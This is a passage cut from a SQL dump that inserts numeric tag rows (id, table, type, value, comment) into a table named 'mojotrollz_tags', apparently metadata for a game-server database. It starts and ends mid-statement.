(`id`, `table`, `type`, `value`, `comment`) VALUES (4879, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4880, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4880, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4883, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4883, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4884, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4884, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4885, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4885, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4886, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4886, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4887, 1, 1, 48, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4887, 1, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4887, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4888, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4888, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4889, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4889, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4890, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4890, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4891, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4891, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4892, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4892, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4893, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4893, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4894, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4894, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4895, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4895, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4896, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4896, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4897, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4897, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4898, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4898, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4899, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4899, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4900, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4900, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4901, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4901, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4902, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4902, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4921, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4921, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4922, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4922, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4923, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4923, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4924, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4924, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4926, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4926, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4941, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4941, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4943, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4943, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4944, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4944, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4945, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4945, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4946, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4946, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4947, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4947, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4948, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4948, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4949, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4949, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4949, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4949, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4949, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4949, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4950, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4950, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4951, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4951, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4952, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4952, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4953, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4953, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4954, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4954, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4958, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4959, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4959, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4960, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4960, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4961, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4961, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4962, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4962, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4963, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4963, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4964, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4964, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4965, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4965, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4966, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4966, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4967, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4967, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4968, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4968, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4969, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4971, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4972, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4973, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4973, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4974, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4974, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4977, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4978, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4979, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4979, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4980, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4980, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4981, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4981, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4982, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4982, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4983, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4983, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4984, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4984, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4995, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4995, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4996, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4996, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5042, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5042, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5043, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5043, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5044, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5045, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5046, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5047, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5047, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5048, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5048, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5048, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5049, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5049, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5052, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5052, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5052, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5052, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5052, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5053, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5053, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5053, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5054, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5054, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5055, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5055, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5055, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5056, 1, 1, 43, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5056, 1, 2, 718, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5056, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5057, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5057, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5058, 1, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5058, 1, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5058, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5081, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5081, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5082, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5082, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5083, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5083, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5085, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5085, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5086, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5086, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5087, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5087, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5088, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5089, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5089, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5090, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5090, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5091, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5091, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5092, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5092, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5093, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5093, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5094, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5094, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5095, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5095, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5096, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5096, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5097, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5099, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5099, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5100, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5100, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5101, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5101, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5102, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5102, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5103, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5103, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5106, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5106, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5107, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5107, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5108, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5108, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5109, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5109, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5110, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5110, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5111, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5111, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5112, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5112, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5113, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5113, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5114, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5114, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5115, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5115, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5116, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5116, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5117, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5117, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5118, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5118, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5119, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5119, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5120, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5120, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5121, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5121, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5122, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 